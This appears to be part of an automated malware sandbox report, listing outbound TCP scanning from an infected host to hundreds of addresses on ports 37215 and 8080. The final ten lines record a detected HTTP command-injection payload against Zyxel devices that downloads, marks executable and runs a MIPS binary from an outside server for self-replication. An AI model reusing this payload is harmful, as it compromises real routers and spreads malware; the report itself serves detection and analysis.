          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.238.21.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.228.245.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.128.208.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.226.74.163:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.90.253.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.7.178.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.239.7.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.153.142.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.149.220.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.65.114.254:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 222.140.142.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.168.35.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.156.154.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.148.114.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.173.42.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.73.188.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 140.236.112.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 70.128.181.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.173.160.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.182.60.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.36.200.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.35.76.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.182.16.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 71.181.48.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 118.98.172.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.18.238.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.128.132.37:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 177.194.141.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.167.162.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.198.99.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.40.195.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 53.130.245.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 193.74.169.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.157.15.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.133.235.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.135.20.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 167.144.91.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.64.214.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.103.67.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 206.226.173.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.200.202.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.47.240.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.40.54.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 207.26.67.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.206.40.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 43.21.184.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 204.208.148.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.43.5.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 85.229.92.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 200.71.27.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.204.70.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 166.148.226.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 129.36.77.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.226.34.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.155.113.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 97.76.242.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.81.7.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 149.182.156.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.81.122.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.70.52.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.85.183.140:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 213.181.231.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.79.203.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.32.140.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.120.99.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.1.174.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 115.67.170.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.82.234.37:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 117.197.6.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 150.4.213.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.65.110.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.37.107.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.10.218.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 200.141.77.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 199.36.98.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.154.201.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.68.101.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.214.48.252:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.148.134.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 197.24.32.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 157.18.167.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:27207 -> 41.117.186.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 84.40.44.212:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 39.16.186.203:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 189.137.97.57:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 112.9.77.190:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 158.224.49.90:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 182.200.44.65:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 160.192.151.244:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 69.190.14.32:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 203.109.158.84:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 178.235.5.59:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 38.19.136.248:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 46.16.80.193:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 219.151.58.206:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 46.73.97.18:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 58.33.69.19:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 213.68.114.139:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 39.11.112.116:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 54.144.209.190:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 76.35.1.202:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 208.103.101.227:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 166.47.142.222:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 118.233.34.49:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 14.111.125.196:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 82.196.208.8:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 34.238.169.163:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 147.59.14.101:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 209.181.11.82:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 217.192.67.233:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 126.47.42.147:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 75.33.67.15:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 46.30.210.206:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 79.122.147.4:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 42.170.97.130:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 5.134.28.221:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 97.126.31.230:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 117.33.110.192:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 44.34.94.134:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 65.248.202.55:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 125.145.117.118:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 143.174.86.96:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 94.67.237.166:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 174.35.131.241:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 115.102.53.123:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 145.159.195.68:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 138.194.31.16:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 169.206.134.193:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 85.48.93.169:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 166.238.140.6:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 73.147.30.34:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 158.63.182.85:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 69.6.156.10:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 99.15.183.28:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 40.66.229.163:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 69.190.120.28:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 130.132.86.163:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 175.174.54.170:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 96.98.80.22:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 66.136.131.155:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 218.61.232.65:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 107.90.116.80:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 222.8.172.240:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 190.180.200.128:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 121.145.23.109:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 120.71.90.116:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 126.140.56.65:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 36.209.58.9:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 92.52.176.199:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 204.172.155.1:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 213.234.255.161:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 103.226.163.118:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 13.7.73.119:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 148.68.147.152:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 2.144.147.146:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 126.143.40.221:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 63.98.138.36:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 94.217.45.156:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 61.131.236.205:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 189.157.69.74:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 183.192.49.213:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 158.45.174.50:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 132.173.225.129:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 179.235.77.15:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 97.191.69.220:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 108.205.144.250:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 169.53.179.233:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 163.126.0.15:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 79.205.174.161:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 156.220.177.55:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 155.56.253.75:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 223.187.171.22:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 12.214.70.249:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 23.176.227.21:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 201.99.120.196:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 134.2.35.237:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 36.155.133.181:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 133.76.202.251:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 5.96.61.253:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 46.29.76.150:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 37.224.34.209:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 183.128.109.97:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 113.56.196.74:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 76.231.163.50:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 42.200.34.21:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 118.102.73.147:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 62.51.235.157:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 132.72.110.136:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 158.72.42.34:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 57.108.154.16:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 77.36.127.217:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 184.167.189.20:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 218.185.69.137:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 207.54.24.159:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 43.22.172.87:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 102.235.120.143:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 145.24.98.164:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 136.50.3.123:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 141.244.17.200:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 123.9.115.199:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 84.168.206.10:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 25.153.248.29:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 5.235.217.203:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 138.158.87.72:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 17.14.84.218:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 178.176.207.211:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 178.97.165.244:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 68.37.124.177:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 133.136.131.232:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 136.154.175.152:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 195.250.224.106:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 193.27.214.231:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 107.114.239.188:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 95.161.84.165:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 40.1.192.185:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 90.112.138.237:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 217.30.249.177:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 27.178.249.20:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 36.162.111.250:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 149.148.30.10:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 9.104.154.132:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 5.216.217.94:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 77.221.115.185:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 89.7.78.3:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 1.18.152.36:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 180.23.179.22:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 61.60.186.50:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 219.198.223.47:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 44.220.139.213:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 173.11.160.170:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 43.54.94.179:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 98.63.139.164:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 59.38.45.51:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 222.68.247.182:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 2.199.96.37:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 50.211.7.96:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 207.142.117.220:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 8.187.144.13:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 161.176.108.192:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 37.88.206.130:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 213.227.205.67:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 53.78.143.241:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 35.174.53.225:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 73.210.149.17:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 134.71.105.228:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 90.30.233.40:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 138.61.164.166:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 95.101.23.132:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 98.196.21.99:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 23.135.246.138:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 141.127.2.95:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 209.104.229.17:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 157.87.232.165:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 95.221.231.138:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 105.126.73.200:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 83.67.1.105:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 121.192.18.150:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 44.84.172.47:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 38.218.238.243:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 132.46.110.234:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 78.172.61.250:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 115.50.246.140:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 142.78.248.197:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 187.103.71.217:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 165.56.129.234:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 167.12.62.11:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 133.209.1.247:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 71.41.54.124:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 95.220.174.177:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 112.213.196.73:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 101.106.158.43:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 203.204.48.40:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 152.223.129.179:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 144.50.77.34:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 89.122.237.18:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 119.19.155.110:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 47.58.164.81:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 24.90.140.164:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 202.187.196.226:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 90.194.233.145:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 62.143.240.122:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 92.88.94.30:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 92.140.42.126:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 71.23.175.188:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 59.230.112.46:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 156.177.36.112:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 110.51.221.254:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 69.33.99.68:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 217.51.15.26:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 37.249.105.189:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 164.166.211.37:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 190.150.218.133:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 138.196.85.123:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 173.82.124.48:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 211.224.5.234:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 117.228.88.195:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 129.89.37.172:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 27.107.188.179:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 70.172.70.148:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 61.36.58.2:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 63.139.71.216:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 205.203.54.249:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 112.160.224.66:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 137.130.173.38:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 85.58.137.54:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 84.24.86.149:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 201.76.85.255:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 129.49.51.56:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 57.167.144.92:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 140.196.118.27:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 212.206.131.85:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 54.48.167.229:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 80.228.90.117:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 125.32.49.216:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 96.170.232.169:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 92.90.55.246:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 198.214.9.73:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 32.233.232.39:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 142.225.157.140:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 123.172.164.215:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 73.148.151.9:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 63.181.78.27:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 207.198.67.175:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 12.216.88.160:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 131.144.15.24:8080
          Source: global trafficTCP traffic: 192.168.2.23:26695 -> 162.77.131.24:8080
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
